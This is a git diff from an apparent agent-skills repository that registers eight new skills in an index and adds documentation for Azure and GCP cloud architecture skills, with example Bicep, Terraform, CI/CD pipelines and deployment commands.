diff --git a/.codex/skills-index.json b/.codex/skills-index.json index 6af38e8..17bd537 100644 --- a/.codex/skills-index.json +++ b/.codex/skills-index.json @@ -3,7 +3,7 @@ "name": "claude-code-skills", "description": "Production-ready skill packages for AI agents - Marketing, Engineering, Product, C-Level, PM, and RA/QM", "repository": "https://github.com/alirezarezvani/claude-skills", - "total_skills": 166, + "total_skills": 174, "skills": [ { "name": "contract-and-proposal-writer", @@ -209,6 +209,12 @@ "category": "engineering", "description": "Design AWS architectures for startups using serverless patterns and IaC templates. Use when asked to design serverless architecture, create CloudFormation templates, optimize AWS costs, set up CI/CD pipelines, or migrate to AWS. Covers Lambda, API Gateway, DynamoDB, ECS, Aurora, and cost optimization." }, + { + "name": "azure-cloud-architect", + "source": "../../engineering-team/azure-cloud-architect", + "category": "engineering", + "description": "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization." + }, { "name": "code-reviewer", "source": "../../engineering-team/code-reviewer", @@ -227,6 +233,12 @@ "category": "engineering", "description": ">" }, + { + "name": "gcp-cloud-architect", + "source": "../../engineering-team/gcp-cloud-architect", + "category": "engineering", + "description": "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure BigQuery pipelines, optimize GCP costs, or migrate to GCP. Covers Cloud Run, GKE, Cloud Functions, Cloud SQL, BigQuery, and cost optimization." 
+ }, { "name": "google-workspace-cli", "source": "../../engineering-team/google-workspace-cli", @@ -251,6 +263,12 @@ "category": "engineering", "description": "Production-grade Playwright testing toolkit. Use when the user mentions Playwright tests, end-to-end testing, browser automation, fixing flaky tests, test migration, CI/CD testing, or test suites. Generate tests, fix flaky failures, migrate from Cypress/Selenium, sync with TestRail, run on BrowserStack. 55 templates, 3 agents, smart reporting." }, + { + "name": "security-pen-testing", + "source": "../../engineering-team/security-pen-testing", + "category": "engineering", + "description": "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation." + }, { "name": "self-improving-agent", "source": "../../engineering-team/self-improving-agent", @@ -345,7 +363,7 @@ "name": "tdd-guide", "source": "../../engineering-team/tdd-guide", "category": "engineering", - "description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit. Handles test generation from source code, coverage report parsing (LCOV/JSON/XML), quality scoring, and framework conversion for TypeScript, JavaScript, Python, and Java projects." + "description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. 
Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit." }, { "name": "tech-stack-evaluator", @@ -389,6 +407,12 @@ "category": "engineering-advanced", "description": "Autonomous experiment loop that optimizes any file by a measurable metric. Inspired by Karpathy's autoresearch. The agent edits a target file, runs a fixed evaluation, keeps improvements (git commit), discards failures (git reset), and loops indefinitely. Use when: user wants to optimize code speed, reduce bundle/image size, improve test pass rate, optimize prompts, improve content quality (headlines, copy, CTR), or run any measurable improvement loop. Requires: a target file, an evaluation command that outputs a metric, and a git repo." }, + { + "name": "browser-automation", + "source": "../../engineering/browser-automation", + "category": "engineering-advanced", + "description": "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build web automation workflows. NOT for testing \u2014 use playwright-pro for that." + }, { "name": "changelog-generator", "source": "../../engineering/changelog-generator", @@ -515,6 +539,12 @@ "category": "engineering-advanced", "description": "Runbook Generator" }, + { + "name": "secrets-vault-manager", + "source": "../../engineering/secrets-vault-manager", + "category": "engineering-advanced", + "description": "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager, Azure Key Vault, GCP Secret Manager), implement secret rotation, or audit secret access patterns." 
+ }, { "name": "skill-security-auditor", "source": "../../engineering/skill-security-auditor", @@ -527,6 +557,18 @@ "category": "engineering-advanced", "description": "Skill Tester" }, + { + "name": "spec-driven-workflow", + "source": "../../engineering/spec-driven-workflow", + "category": "engineering-advanced", + "description": "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, generate tests from specifications, or follow spec-first development practices." + }, + { + "name": "sql-database-assistant", + "source": "../../engineering/sql-database-assistant", + "category": "engineering-advanced", + "description": "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like Prisma, Drizzle, TypeORM, or SQLAlchemy." + }, { "name": "tech-debt-tracker", "source": "../../engineering/tech-debt-tracker", @@ -1000,6 +1042,12 @@ "source": "../../ra-qm-team/risk-management-specialist", "category": "ra-qm", "description": "Medical device risk management specialist implementing ISO 14971 throughout product lifecycle. Provides risk analysis, risk evaluation, risk control, and post-production information analysis. Use when user mentions risk management, ISO 14971, risk analysis, FMEA, fault tree analysis, hazard identification, risk control, risk matrix, benefit-risk analysis, residual risk, risk acceptability, or post-market risk." + }, + { + "name": "soc2-compliance", + "source": "../../ra-qm-team/soc2-compliance", + "category": "ra-qm", + "description": "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis, or assess SOC 2 Type I vs Type II readiness." 
} ], "categories": { @@ -1014,12 +1062,12 @@ "description": "Executive leadership and advisory skills" }, "engineering": { - "count": 26, + "count": 29, "source": "../../engineering-team", "description": "Software engineering and technical skills" }, "engineering-advanced": { - "count": 31, + "count": 35, "source": "../../engineering", "description": "Advanced engineering skills - agents, RAG, MCP, CI/CD, databases, observability" }, @@ -1044,7 +1092,7 @@ "description": "Project management and Atlassian skills" }, "ra-qm": { - "count": 12, + "count": 13, "source": "../../ra-qm-team", "description": "Regulatory affairs and quality management skills" } diff --git a/.codex/skills/azure-cloud-architect b/.codex/skills/azure-cloud-architect new file mode 120000 index 0000000..c60202c --- /dev/null +++ b/.codex/skills/azure-cloud-architect @@ -0,0 +1 @@ +../../engineering-team/azure-cloud-architect \ No newline at end of file diff --git a/.codex/skills/browser-automation b/.codex/skills/browser-automation new file mode 120000 index 0000000..6c45eed --- /dev/null +++ b/.codex/skills/browser-automation @@ -0,0 +1 @@ +../../engineering/browser-automation \ No newline at end of file diff --git a/.codex/skills/gcp-cloud-architect b/.codex/skills/gcp-cloud-architect new file mode 120000 index 0000000..a424d26 --- /dev/null +++ b/.codex/skills/gcp-cloud-architect @@ -0,0 +1 @@ +../../engineering-team/gcp-cloud-architect \ No newline at end of file diff --git a/.codex/skills/secrets-vault-manager b/.codex/skills/secrets-vault-manager new file mode 120000 index 0000000..b229afe --- /dev/null +++ b/.codex/skills/secrets-vault-manager @@ -0,0 +1 @@ +../../engineering/secrets-vault-manager \ No newline at end of file diff --git a/.codex/skills/security-pen-testing b/.codex/skills/security-pen-testing new file mode 120000 index 0000000..17c191c --- /dev/null +++ b/.codex/skills/security-pen-testing @@ -0,0 +1 @@ +../../engineering-team/security-pen-testing \ No newline at end of file 
diff --git a/.codex/skills/soc2-compliance b/.codex/skills/soc2-compliance new file mode 120000 index 0000000..3eb5b31 --- /dev/null +++ b/.codex/skills/soc2-compliance @@ -0,0 +1 @@ +../../ra-qm-team/soc2-compliance \ No newline at end of file diff --git a/.codex/skills/spec-driven-workflow b/.codex/skills/spec-driven-workflow new file mode 120000 index 0000000..0b134e9 --- /dev/null +++ b/.codex/skills/spec-driven-workflow @@ -0,0 +1 @@ +../../engineering/spec-driven-workflow \ No newline at end of file diff --git a/.codex/skills/sql-database-assistant b/.codex/skills/sql-database-assistant new file mode 120000 index 0000000..bcc21a8 --- /dev/null +++ b/.codex/skills/sql-database-assistant @@ -0,0 +1 @@ +../../engineering/sql-database-assistant \ No newline at end of file diff --git a/docs/skills/engineering-team/azure-cloud-architect.md b/docs/skills/engineering-team/azure-cloud-architect.md new file mode 100644 index 0000000..36e7ed0 --- /dev/null +++ b/docs/skills/engineering-team/azure-cloud-architect.md @@ -0,0 +1,462 @@ +--- +title: "Azure Cloud Architect — Agent Skill & Codex Plugin" +description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, or optimize Azure costs. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# Azure Cloud Architect + +
+:material-code-braces: Engineering - Core +:material-identifier: `azure-cloud-architect` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-skills +
+ + +Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates. + +--- + +## Workflow + +### Step 1: Gather Requirements + +Collect application specifications: + +``` +- Application type (web app, mobile backend, data pipeline, SaaS, microservices) +- Expected users and requests per second +- Budget constraints (monthly spend limit) +- Team size and Azure experience level +- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001) +- Availability requirements (SLA, RPO/RTO) +- Region preferences (data residency, latency) +``` + +### Step 2: Design Architecture + +Run the architecture designer to get pattern recommendations: + +```bash +python scripts/architecture_designer.py \ + --app-type web_app \ + --users 10000 \ + --requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}' +``` + +**Example output:** + +```json +{ + "recommended_pattern": "app_service_web", + "service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"], + "estimated_monthly_cost_usd": 280, + "pros": ["Managed platform", "Built-in autoscale", "Deployment slots"], + "cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"] +} +``` + +Select from recommended patterns: +- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache +- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management +- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB +- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs + +See `references/architecture_patterns.md` for detailed pattern specifications. + +**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3. 
+ +### Step 3: Generate IaC Templates + +Create infrastructure-as-code for the selected pattern: + +```bash +# Web app stack (Bicep) +python scripts/bicep_generator.py --arch-type web-app --output main.bicep +``` + +**Example Bicep output (core web app resources):** + +```bicep +@description('The environment name') +param environment string = 'dev' + +@description('The Azure region for resources') +param location string = resourceGroup().location + +@description('The application name') +param appName string = 'myapp' + +// App Service Plan +resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = { + name: '${environment}-${appName}-plan' + location: location + sku: { + name: 'P1v3' + tier: 'PremiumV3' + capacity: 1 + } + properties: { + reserved: true // Linux + } +} + +// App Service +resource appService 'Microsoft.Web/sites@2023-01-01' = { + name: '${environment}-${appName}-web' + location: location + properties: { + serverFarmId: appServicePlan.id + httpsOnly: true + siteConfig: { + linuxFxVersion: 'NODE|20-lts' + minTlsVersion: '1.2' + ftpsState: 'Disabled' + alwaysOn: true + } + } + identity: { + type: 'SystemAssigned' + } +} + +// Azure SQL Database +resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = { + name: '${environment}-${appName}-sql' + location: location + properties: { + administrators: { + azureADOnlyAuthentication: true + } + minimalTlsVersion: '1.2' + } +} + +resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = { + parent: sqlServer + name: '${appName}-db' + location: location + sku: { + name: 'GP_S_Gen5_2' + tier: 'GeneralPurpose' + } + properties: { + autoPauseDelay: 60 + minCapacity: json('0.5') + } +} +``` + +> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`. 
+ +**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft. + +### Step 4: Review Costs + +Analyze estimated costs and optimization opportunities: + +```bash +python scripts/cost_optimizer.py \ + --config current_resources.json \ + --json +``` + +**Example output:** + +```json +{ + "current_monthly_usd": 2000, + "recommendations": [ + { "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" }, + { "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" }, + { "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" } + ], + "total_potential_savings_usd": 735 +} +``` + +Output includes: +- Monthly cost breakdown by service +- Right-sizing recommendations +- Reserved Instance and Savings Plan opportunities +- Potential monthly savings + +### Step 5: Configure CI/CD + +Set up Azure DevOps Pipelines or GitHub Actions with Azure: + +```yaml +# GitHub Actions — deploy Bicep to Azure +name: Deploy Infrastructure +on: + push: + branches: [main] + +permissions: + id-token: write + contents: read + +jobs: + deploy: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - uses: azure/login@v2 + with: + client-id: ${{ secrets.AZURE_CLIENT_ID }} + tenant-id: ${{ secrets.AZURE_TENANT_ID }} + subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} + + - uses: azure/arm-deploy@v2 + with: + resourceGroupName: rg-myapp-dev + template: ./infra/main.bicep + parameters: environment=dev +``` + +```yaml +# Azure DevOps Pipeline +trigger: + branches: + include: + - main + +pool: + vmImage: 'ubuntu-latest' + +steps: + - task: AzureCLI@2 + inputs: + azureSubscription: 'MyServiceConnection' + scriptType: 'bash' + scriptLocation: 'inlineScript' + inlineScript: | + az deployment group create \ + 
--resource-group rg-myapp-dev \ + --template-file infra/main.bicep \ + --parameters environment=dev +``` + +### Step 6: Security Review + +Validate security posture before production: + +- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code +- **Secrets**: Key Vault for all secrets, certificates, and connection strings +- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF +- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest +- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails +- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives + +**If deployment fails:** + +1. Check the deployment status: + ```bash + az deployment group show \ + --resource-group rg-myapp-dev \ + --name main \ + --query 'properties.error' + ``` +2. Review Activity Log for RBAC or policy errors. +3. Validate the Bicep template before deploying: + ```bash + az bicep build --file main.bicep + az deployment group validate \ + --resource-group rg-myapp-dev \ + --template-file main.bicep + ``` + +**Common failure causes:** +- RBAC permission errors — verify the deploying principal has Contributor on the resource group +- Resource provider not registered — run `az provider register --namespace Microsoft.Web` +- Naming conflicts — some Azure resource names must be globally unique (e.g., storage accounts, web apps) +- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas + +--- + +## Tools + +### architecture_designer.py + +Generates architecture pattern recommendations based on requirements. 
+ +```bash +python scripts/architecture_designer.py \ + --app-type web_app \ + --users 50000 \ + --requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \ + --json +``` + +**Input:** Application type, expected users, JSON requirements +**Output:** Recommended pattern, service stack, cost estimate, pros/cons + +### cost_optimizer.py + +Analyzes Azure resource configurations for cost savings. + +```bash +python scripts/cost_optimizer.py --config resources.json --json +``` + +**Input:** JSON file with current Azure resource inventory +**Output:** Recommendations for: +- Idle resource removal +- VM and database right-sizing +- Reserved Instance purchases +- Storage tier transitions +- Unused public IPs and load balancers + +### bicep_generator.py + +Generates Bicep template scaffolds from architecture type. + +```bash +python scripts/bicep_generator.py --arch-type microservices --output main.bicep +``` + +**Output:** Production-ready Bicep templates with: +- Managed Identity (no passwords) +- Key Vault integration +- Diagnostic settings for Azure Monitor +- Network security groups +- Tags for cost allocation + +--- + +## Quick Start + +### Web App Architecture (< $100/month) + +``` +Ask: "Design an Azure web app for a startup with 5000 users" + +Result: +- App Service (B1 Linux) for the application +- Azure SQL Serverless for relational data +- Azure Blob Storage for static assets +- Front Door (free tier) for CDN and routing +- Key Vault for secrets +- Estimated: $40-80/month +``` + +### Microservices on AKS ($500-2000/month) + +``` +Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users" + +Result: +- AKS cluster with 3 node pools (system, app, jobs) +- API Management for gateway and rate limiting +- Cosmos DB for multi-model data +- Service Bus for async messaging +- Azure Monitor + Application Insights for observability +- Multi-zone deployment +``` + +### Serverless Event-Driven (< $200/month) + +``` +Ask: "Design an 
event-driven backend for processing orders" + +Result: +- Azure Functions (Consumption plan) for compute +- Event Grid for event routing +- Service Bus for reliable messaging +- Cosmos DB for order data +- Application Insights for monitoring +- Estimated: $30-150/month depending on volume +``` + +### Data Pipeline ($300-1500/month) + +``` +Ask: "Design a data pipeline for ingesting 10M events/day" + +Result: +- Event Hubs for ingestion +- Stream Analytics or Functions for processing +- Data Lake Storage Gen2 for raw data +- Synapse Analytics for warehouse +- Power BI for dashboards +``` + +--- + +## Input Requirements + +Provide these details for architecture design: + +| Requirement | Description | Example | +|-------------|-------------|---------| +| Application type | What you're building | SaaS platform, mobile backend | +| Expected scale | Users, requests/sec | 10k users, 100 RPS | +| Budget | Monthly Azure limit | $500/month max | +| Team context | Size, Azure experience | 3 devs, intermediate | +| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 | +| Availability | Uptime requirements | 99.9% SLA, 1hr RPO | + +**JSON Format:** + +```json +{ + "application_type": "saas_platform", + "expected_users": 10000, + "requests_per_second": 100, + "budget_monthly_usd": 500, + "team_size": 3, + "azure_experience": "intermediate", + "compliance": ["SOC2"], + "availability_sla": "99.9%" +} +``` + +--- + +## Anti-Patterns + +| Anti-Pattern | Why It Fails | Do This Instead | +|---|---|---| +| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax | +| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings | +| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs | +| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration | +| Over-provisioning 
"just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly | +| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload | +| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name | +| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively | + +--- + +## Output Formats + +### Architecture Design + +- Pattern recommendation with rationale +- Service stack diagram (ASCII) +- Monthly cost estimate and trade-offs + +### IaC Templates + +- **Bicep**: Recommended — first-party, module support, clean syntax +- **ARM JSON**: Generated from Bicep when needed +- **Terraform HCL**: Multi-cloud compatible using azurerm provider + +### Cost Analysis + +- Current spend breakdown with optimization recommendations +- Priority action list (high/medium/low) and implementation checklist + +--- + +## Reference Documentation + +| Document | Contents | +|----------|----------| +| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region | +| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking | +| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR | diff --git a/docs/skills/engineering-team/gcp-cloud-architect.md b/docs/skills/engineering-team/gcp-cloud-architect.md new file mode 100644 index 0000000..58b51d8 --- /dev/null +++ b/docs/skills/engineering-team/gcp-cloud-architect.md @@ -0,0 +1,429 @@ +--- +title: "GCP Cloud Architect — Agent Skill & Codex Plugin" +description: "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# GCP Cloud Architect + +
+:material-code-braces: Engineering - Core +:material-identifier: `gcp-cloud-architect` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-skills +
+ + +Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code templates. + +--- + +## Workflow + +### Step 1: Gather Requirements + +Collect application specifications: + +``` +- Application type (web app, mobile backend, data pipeline, SaaS) +- Expected users and requests per second +- Budget constraints (monthly spend limit) +- Team size and GCP experience level +- Compliance requirements (GDPR, HIPAA, SOC 2) +- Availability requirements (SLA, RPO/RTO) +``` + +### Step 2: Design Architecture + +Run the architecture designer to get pattern recommendations: + +```bash +python scripts/architecture_designer.py --input requirements.json +``` + +**Example output:** + +```json +{ + "recommended_pattern": "serverless_web", + "service_stack": ["Cloud Storage", "Cloud CDN", "Cloud Run", "Firestore", "Identity Platform"], + "estimated_monthly_cost_usd": 30, + "pros": ["Low ops overhead", "Pay-per-use", "Auto-scaling", "No cold starts on Cloud Run min instances"], + "cons": ["Vendor lock-in", "Regional limitations", "Eventual consistency with Firestore"] +} +``` + +Select from recommended patterns: +- **Serverless Web**: Cloud Storage + Cloud CDN + Cloud Run + Firestore +- **Microservices on GKE**: GKE Autopilot + Cloud SQL + Memorystore + Cloud Pub/Sub +- **Serverless Data Pipeline**: Pub/Sub + Dataflow + BigQuery + Looker +- **ML Platform**: Vertex AI + Cloud Storage + BigQuery + Cloud Functions + +See `references/architecture_patterns.md` for detailed pattern specifications. + +**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3. 
+ +### Step 3: Estimate Cost + +Analyze estimated costs and optimization opportunities: + +```bash +python scripts/cost_optimizer.py --resources current_setup.json --monthly-spend 2000 +``` + +**Example output:** + +```json +{ + "current_monthly_usd": 2000, + "recommendations": [ + { "action": "Right-size Cloud SQL db-custom-4-16384 to db-custom-2-8192", "savings_usd": 380, "priority": "high" }, + { "action": "Purchase 1-yr committed use discount for GKE nodes", "savings_usd": 290, "priority": "high" }, + { "action": "Move Cloud Storage objects >90 days to Nearline", "savings_usd": 75, "priority": "medium" } + ], + "total_potential_savings_usd": 745 +} +``` + +Output includes: +- Monthly cost breakdown by service +- Right-sizing recommendations +- Committed use discount opportunities +- Sustained use discount analysis +- Potential monthly savings + +Use the [GCP Pricing Calculator](https://cloud.google.com/products/calculator) for detailed estimates. + +### Step 4: Generate IaC + +Create infrastructure-as-code for the selected pattern: + +```bash +python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1 +``` + +**Example Terraform HCL output (Cloud Run + Firestore):** + +```hcl +terraform { + required_providers { + google = { + source = "hashicorp/google" + version = "~> 5.0" + } + } +} + +provider "google" { + project = var.project_id + region = var.region +} + +variable "project_id" { + description = "GCP project ID" + type = string +} + +variable "region" { + description = "GCP region" + type = string + default = "us-central1" +} + +resource "google_cloud_run_v2_service" "api" { + name = "${var.environment}-${var.app_name}-api" + location = var.region + + template { + containers { + image = "gcr.io/${var.project_id}/${var.app_name}:latest" + resources { + limits = { + cpu = "1000m" + memory = "512Mi" + } + } + env { + name = "FIRESTORE_PROJECT" + value = var.project_id + } + } + scaling { + min_instance_count = 0 + 
max_instance_count = 10 + } + } +} + +resource "google_firestore_database" "default" { + project = var.project_id + name = "(default)" + location_id = var.region + type = "FIRESTORE_NATIVE" +} +``` + +**Example gcloud CLI deployment:** + +```bash +# Deploy Cloud Run service +gcloud run deploy my-app-api \ + --image gcr.io/$PROJECT_ID/my-app:latest \ + --region us-central1 \ + --platform managed \ + --allow-unauthenticated \ + --memory 512Mi \ + --cpu 1 \ + --min-instances 0 \ + --max-instances 10 + +# Create Firestore database +gcloud firestore databases create --location=us-central1 +``` + +> Full templates including Cloud CDN, Identity Platform, IAM, and Cloud Monitoring are generated by `deployment_manager.py` and also available in `references/architecture_patterns.md`. + +### Step 5: Configure CI/CD + +Set up automated deployment with Cloud Build or GitHub Actions: + +```yaml +# cloudbuild.yaml +steps: + - name: 'gcr.io/cloud-builders/docker' + args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA', '.'] + + - name: 'gcr.io/cloud-builders/docker' + args: ['push', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'] + + - name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + entrypoint: gcloud + args: + - 'run' + - 'deploy' + - 'my-app-api' + - '--image=gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA' + - '--region=us-central1' + - '--platform=managed' + +images: + - 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA' +``` + +```bash +# Connect repo and create trigger +gcloud builds triggers create github \ + --repo-name=my-app \ + --repo-owner=my-org \ + --branch-pattern="^main$" \ + --build-config=cloudbuild.yaml +``` + +### Step 6: Security Review + +Verify security configuration: + +```bash +# Review IAM bindings +gcloud projects get-iam-policy $PROJECT_ID --format=json + +# Check service account permissions +gcloud iam service-accounts list --project=$PROJECT_ID + +# Verify VPC Service Controls (if applicable) +gcloud access-context-manager perimeters list --policy=$POLICY_ID +``` + 
+**Security checklist:** +- IAM roles follow least privilege (prefer predefined roles over basic roles) +- Service accounts use Workload Identity for GKE +- VPC Service Controls configured for sensitive APIs +- Cloud KMS encryption keys for customer-managed encryption +- Cloud Audit Logs enabled for all admin activity +- Organization policies restrict public access +- Secret Manager used for all credentials + +**If deployment fails:** + +1. Check the failure reason: + ```bash + gcloud run services describe my-app-api --region us-central1 + gcloud logging read "resource.type=cloud_run_revision" --limit=20 + ``` +2. Review Cloud Logging for application errors. +3. Fix the configuration or container image. +4. Redeploy: + ```bash + gcloud run deploy my-app-api --image gcr.io/$PROJECT_ID/my-app:latest --region us-central1 + ``` + +**Common failure causes:** +- IAM permission errors -- verify service account roles and `--allow-unauthenticated` flag +- Quota exceeded -- request quota increase via IAM & Admin > Quotas +- Container startup failure -- check container logs and health check configuration +- API not enabled -- enable the required APIs with `gcloud services enable` + +--- + +## Tools + +### architecture_designer.py + +Recommends GCP services based on workload requirements. + +```bash +python scripts/architecture_designer.py --input requirements.json --output design.json +``` + +**Input:** JSON with app type, scale, budget, compliance needs +**Output:** Recommended pattern, service stack, cost estimate, pros/cons + +### cost_optimizer.py + +Analyzes GCP resources for cost savings. + +```bash +python scripts/cost_optimizer.py --resources inventory.json --monthly-spend 5000 +``` + +**Output:** Recommendations for: +- Idle resource removal +- Machine type right-sizing +- Committed use discounts +- Storage class transitions +- Network egress optimization + +### deployment_manager.py + +Generates gcloud CLI deployment scripts and Terraform configurations. 
+ +```bash +python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1 +``` + +**Output:** Production-ready deployment scripts with: +- Cloud Run or GKE deployment +- Firestore or Cloud SQL setup +- Identity Platform configuration +- IAM roles with least privilege +- Cloud Monitoring and Logging + +--- + +## Quick Start + +### Web App on Cloud Run (< $100/month) + +``` +Ask: "Design a serverless web backend for a mobile app with 1000 users" + +Result: +- Cloud Run for API (auto-scaling, no cold start with min instances) +- Firestore for data (pay-per-operation) +- Identity Platform for authentication +- Cloud Storage + Cloud CDN for static assets +- Estimated: $15-40/month +``` + +### Microservices on GKE ($500-2000/month) + +``` +Ask: "Design a scalable architecture for a SaaS platform with 50k users" + +Result: +- GKE Autopilot for containerized workloads +- Cloud SQL (PostgreSQL) with read replicas +- Memorystore (Redis) for session caching +- Cloud CDN for global delivery +- Cloud Build for CI/CD +- Multi-zone deployment +``` + +### Serverless Data Pipeline + +``` +Ask: "Design a real-time analytics pipeline for event data" + +Result: +- Pub/Sub for event ingestion +- Dataflow (Apache Beam) for stream processing +- BigQuery for analytics and warehousing +- Looker for dashboards +- Cloud Functions for lightweight transforms +``` + +### ML Platform + +``` +Ask: "Design a machine learning platform for model training and serving" + +Result: +- Vertex AI for training and prediction +- Cloud Storage for datasets and model artifacts +- BigQuery for feature store +- Cloud Functions for preprocessing triggers +- Cloud Monitoring for model drift detection +``` + +--- + +## Input Requirements + +Provide these details for architecture design: + +| Requirement | Description | Example | +|-------------|-------------|---------| +| Application type | What you're building | SaaS platform, mobile backend | +| Expected scale | Users, 
requests/sec | 10k users, 100 RPS | +| Budget | Monthly GCP limit | $500/month max | +| Team context | Size, GCP experience | 3 devs, intermediate | +| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 | +| Availability | Uptime requirements | 99.9% SLA, 1hr RPO | + +**JSON Format:** + +```json +{ + "application_type": "saas_platform", + "expected_users": 10000, + "requests_per_second": 100, + "budget_monthly_usd": 500, + "team_size": 3, + "gcp_experience": "intermediate", + "compliance": ["SOC2"], + "availability_sla": "99.9%" +} +``` + +--- + +## Output Formats + +### Architecture Design + +- Pattern recommendation with rationale +- Service stack diagram (ASCII) +- Monthly cost estimate and trade-offs + +### IaC Templates + +- **Terraform HCL**: Production-ready Google provider configs +- **gcloud CLI**: Scripted deployment commands +- **Cloud Build YAML**: CI/CD pipeline definitions + +### Cost Analysis + +- Current spend breakdown with optimization recommendations +- Priority action list (high/medium/low) and implementation checklist + +--- + +## Reference Documentation + +| Document | Contents | +|----------|----------| +| `references/architecture_patterns.md` | 6 patterns: serverless, GKE microservices, three-tier, data pipeline, ML platform, multi-region | +| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging | +| `references/best_practices.md` | Naming, labels, IAM, networking, monitoring, disaster recovery | diff --git a/docs/skills/engineering-team/index.md b/docs/skills/engineering-team/index.md index 9e804b5..de06022 100644 --- a/docs/skills/engineering-team/index.md +++ b/docs/skills/engineering-team/index.md @@ -1,13 +1,13 @@ --- title: "Engineering - Core Skills — Agent Skills & Codex Plugins" -description: "41 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw." 
+description: "44 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw." ---
# :material-code-braces: Engineering - Core -

41 skills in this domain

+

44 skills in this domain

